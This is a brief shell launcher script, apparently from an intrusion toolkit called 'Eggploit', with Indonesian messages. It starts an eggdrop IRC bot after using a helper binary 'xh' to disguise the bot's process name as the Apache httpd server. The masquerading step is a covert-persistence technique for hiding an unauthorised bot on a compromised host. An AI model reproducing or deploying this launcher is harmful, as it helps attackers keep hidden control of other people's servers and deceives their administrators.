##################################### ## EGGPLOIT EGGDROP RUN File v.8.2 ## ## Copyright 2009 ## ## Owner : jery@gothamcasting.com ## ## Thanks To : Aneurysm,deBu,keong ## ## !/bin/sh ## ##################################### if test $# -ne 1 then echo "Cara Penggunaan :" echo "" echo " ./run [config file]" echo "" exit fi if ! test -s $1 then echo "Kesalahan : file $1 tidak ditemukan !!!" echo "" exit fi if ! test -s xh then echo "Kesalahan : file xh tidak ditemukan !!!" echo "" exit fi ./xh -s "/usr/local/apache/bin/httpd -DSSL" ./eggdrop -m $1